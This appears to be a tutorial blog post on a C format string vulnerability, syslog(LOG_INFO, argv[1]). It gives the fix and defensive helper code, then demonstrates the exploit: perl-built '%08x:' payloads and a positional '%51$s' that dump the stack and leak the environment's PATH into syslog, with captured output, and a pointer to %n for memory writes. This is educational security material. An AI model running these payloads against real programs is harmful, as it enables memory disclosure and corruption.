So the answer to Monday’s problem was

syslog(LOG_INFO, argv[1]);

is a format string vulnerability: user-controlled input is passed as the format argument. To solve the problem, the line should be written as:

syslog(LOG_INFO, "%s", argv[1]);
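The same fix as an added example (not code from the post), written with snprintf instead of syslog so the result can be checked, together with two defensive helpers for code paths you cannot rewrite: one that doubles every '%' so user text can be handed to an API that insists on treating it as a format, and one that counts conversion directives in a would-be log message so a burst of them can be flagged. All function names are hypothetical.

```c
/* Added example, not the post's code. The vulnerable call from the post,
 * syslog(LOG_INFO, argv[1]), lets the caller's text act as the format;
 * render_safe() shows the fix: the text is only ever an argument to "%s". */
#include <stdio.h>
#include <string.h>

/* The fix: directives inside msg are inert because the format is a literal.
 * Returns the number of characters snprintf would have written. */
int render_safe(char *out, size_t n, const char *msg) {
    return snprintf(out, n, "%s", msg);
}

/* For printf-style wrappers you cannot change: neutralise every '%' by
 * doubling it, so "%51$s" becomes "%%51$s" and prints literally.
 * Returns 0 on success, -1 if out (size n) is too small. */
int escape_percents(char *out, size_t n, const char *msg) {
    size_t j = 0;
    for (const char *p = msg; *p; p++) {
        size_t need = (*p == '%') ? 2 : 1;
        if (j + need >= n)            /* keep room for the terminator */
            return -1;
        out[j++] = *p;
        if (*p == '%')
            out[j++] = '%';
    }
    out[j] = '\0';
    return 0;
}

/* Detection aid: count conversion directives in free text. "%%" is a
 * literal percent and is not counted. Legitimate messages rarely carry
 * any; a run of "%08x:" or a positional "%51$s" is worth alerting on. */
int count_directives(const char *msg) {
    int count = 0;
    for (const char *p = msg; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {            /* escaped percent, skip the pair */
            p++;
            continue;
        }
        count++;
    }
    return count;
}
```

Building the original program with -Wformat -Wformat-security makes the compiler flag the non-literal format in the Monday version.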

Now, what can be done with this is quite a lot. Enter the following, ./logit $(perl -e 'print "%08X:"x100'), and then look at your system logs. What you are looking at is a dump of the program's stack. But it goes further than that: you can read any area of memory the process itself is able to read. So on my system, which is an AMD64 system, if I run the following:

./a.out $(perl -e 'print "%08x:" x 50 . "%s"')

and view syslog, I see:

Apr 2 11:37:52 logfile[23995]: 00000008:00000000:004006bc:00000003:ffffe798:00000000:00000000:f7aa7b6d:00000000:ffffe798:00000000:00400564: 00000000:af958099:00400480:ffffe790:00000000:00000000:62158099:59c58099:00000000:00000000:00000000:004005e0: ffffe798:00000002:00000000:00000000:00400480:ffffe790:00000000:004004a9:ffffe788:0000001c:00000002:ffffea5c:ffffea64: 00000000:ffffeb61:ffffeb86:ffffebc2:ffffebd2:ffffebe5:ffffebf3:ffffebff:ffffec17:ffffec29:ffffec37:ffffec40:ffffec69:PATH=/opt/wine/bin:/bin:/usr/bin:/sbin:/usr/sbin:/opt/java/bin:/opt/java/jre/bin:/usr/bin/perlbin/site:/usr/bin/perlbin/vendor:/usr/bin/perlbin/core:/opt/qt/bin

Or, more directly, without using perl:

./a.out %51\$s

and see:

Apr 2 12:09:57 logfile[24110]: PATH=/opt/wine/bin:/bin:/usr/bin:/sbin:/usr/sbin:/opt/java/bin:/opt/java/jre/bin:/usr/bin/perlbin/site:/usr/bin/perlbin/vendor:/usr/bin/perlbin/core:/opt/qt/bin

That line has my PATH variable in it. So I am able to read anywhere I want in memory, but what about writing? Well, it turns out I can do that as well. The %n directive stores the number of characters output so far into the address supplied as the corresponding argument. I'll leave that as an exercise for the reader, though. Or maybe, if I can't think of anything else to post, I'll do a write-up on that as well.